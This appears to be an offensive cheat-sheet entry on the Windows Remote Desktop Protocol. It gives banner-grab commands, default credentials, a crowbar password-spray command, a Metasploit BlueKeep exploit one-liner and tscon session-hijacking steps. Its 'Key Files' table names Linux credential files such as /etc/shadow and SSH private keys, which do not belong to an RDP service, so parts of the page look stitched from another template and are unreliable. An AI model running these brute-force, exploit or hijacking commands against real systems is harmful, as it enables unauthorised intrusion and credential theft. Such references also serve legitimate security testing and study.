RDP
RDPRemote DesktopTerminal Services
Remote Desktop Protocol (RDP) provides GUI remote access to Windows. BlueKeep (CVE-2019-0708), credential brute force, and NLA bypass are common issues.
Ports
| Port | Protocol | Description |
|---|---|---|
| 3389 | tcp | RDP |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
/etc/passwd | List of system users |
/etc/shadow | Password hashes for local users |
/etc/ssh/sshd_config | SSH server configuration |
~/.ssh/id_rsa | SSH private key |
Default Credentials
| Username | Password | Context |
|---|---|---|
admin | admin | Generic admin account |
root | root | Generic root account |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
CVE-2019-0708 | RCE | BlueKeep — pre-auth RCE in RDP |
CVE-2020-0662 | RCE | Remote Desktop Services RCE |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Brute Force | crowbar -b rdp -s <target>/32 -u administrator -C pass.txt | RDP password spray |
| BlueKeep | msfconsole -q -x "use exploit/windows/rdp/cve_2019_0708_bluekeep" | Pre-auth RCE |
Notes
BlueKeep (CVE-2019-0708) affects Windows 7/Server 2008 R2 unpatched. Always check the OS version.
RDP session hijacking via `tscon` requires SYSTEM privileges:
`query user` to list sessions, then `tscon <ID> /dest:console`.
Tools: `crowbar`, `hydra`, `BlueKeep` Metasploit module, `rdp-sec-check.pl`.
Seen on
ShodanCensysFOFAZoomEye
References